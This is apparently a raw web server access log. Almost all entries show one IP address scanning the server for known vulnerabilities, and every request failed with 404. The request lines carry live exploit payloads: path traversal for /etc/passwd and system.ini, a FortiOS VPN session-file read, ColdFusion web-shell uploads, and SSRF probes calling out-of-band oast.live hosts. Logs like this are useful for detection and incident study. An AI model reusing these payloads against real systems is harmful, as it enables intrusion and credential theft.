137.220.197.141 - - [21/Jan/2024:06:01:08 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:01:10 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:02:38 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:02:39 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:02:50 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:03:03 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:18 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:32 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:34 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:41 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:53 +0100] "GET /html/log HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:55 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:04:57 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:05:21 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:05:23 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:05:42 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:05:53 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:05:54 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:06:05 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:06:50 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:07:38 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:07:46 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:07:49 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:08:03 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:08:13 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:09:12 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:10:00 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:10:21 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:11:54 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:12:41 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:12:52 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:12:59 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:13:01 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:13:17 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:14:05 +0100] "PUT /meta HTTP/1.1" 404 952
151.84.243.144 - - [21/Jan/2024:06:14:13 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:06:14:50 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:14:52 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:15:00 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:06:15:00 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:15:14 +0100] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:15:41 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:15:43 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:16:06 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:16:19 +0100] "PUT /meta HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:17:54 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:20:15 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:20:26 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:20:29 +0100] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:21:50 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:22:00 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:22:12 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:22:34 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:16 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:28 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:31 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:33 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:38 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:24:41 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:25:15 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
88.161.14.101 - - [21/Jan/2024:06:25:57 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:06:26:02 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:26:20 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:26:24 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:26:32 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:26:45 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:28:34 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:01 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:03 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:28 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:30 +0100] "POST /account HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:30 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:29:57 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:30:04 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:30:33 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:31:27 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:31:54 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:32:03 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:32:15 +0100] "POST /filemanager/upload.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:33:35 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogiqo141qfdbbq5.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:33:59 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:34:01 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:34:24 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:34:58 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogw9nihjj4rn8jo.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:35:08 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogioxgzeugfhjqi.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:35:20 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsog1bxztihk6bznd.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:36:06 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:36:17 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:36:43 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:36:58 +0100] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:16 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:18 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:37 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:40 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:42 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:47 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:37:58 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:06 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:08 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:10 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogadtyyzpibrmng.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:12 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:36 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:50 +0100] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:50 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:52 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:38:54 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogyh5ej4krwyzfr.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:39:15 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:39:16 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogxmb3smxpgiaed.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:39:26 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:39:39 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:41:47 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:41:51 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:41:53 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:13 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:15 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:38 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:40 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:42 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:42:50 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogt69rj649b5k48.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:43:08 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:43:09 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:43:59 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:44:25 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:44:46 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogrbs31e9cf4jhf.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:44:58 +0100] "GET /index.php/System/MailConnect/host/cmm00rc3m87t5g88qsogax6g98wrhiux6.oast.live/port/80/secure/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:45:14 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:45:16 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:47:05 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:47:07 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:47:35 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:47:56 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:47:58 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:48:41 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:49:00 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:49:00 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:49:02 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:49:54 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:09 +0100] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:37 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:42 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:44 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:49 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:50:55 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:51:02 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:51:09 +0100] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:51:29 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:51:31 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:51:44 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:53:07 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:53:17 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:53:29 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:54:29 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:55:21 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:55:45 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:56:20 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:56:41 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:56:43 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:57:07 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:57:27 +0100] "POST /upload HTTP/1.1" 404 952
201.62.59.125 - - [21/Jan/2024:06:59:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:59:28 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:06:59:29 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:00:00 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:01:06 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:01:11 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:01:13 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:01:40 +0100] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:01:42 +0100] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:02:10 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:02:25 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:03:04 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:03:09 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:03:17 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:03:40 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:03:42 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:04:06 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:04:08 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2bECz7YZMneGr2JOIsiMTgf4FUw.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:04:49 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:05:00 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:07:05:14 +0100] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
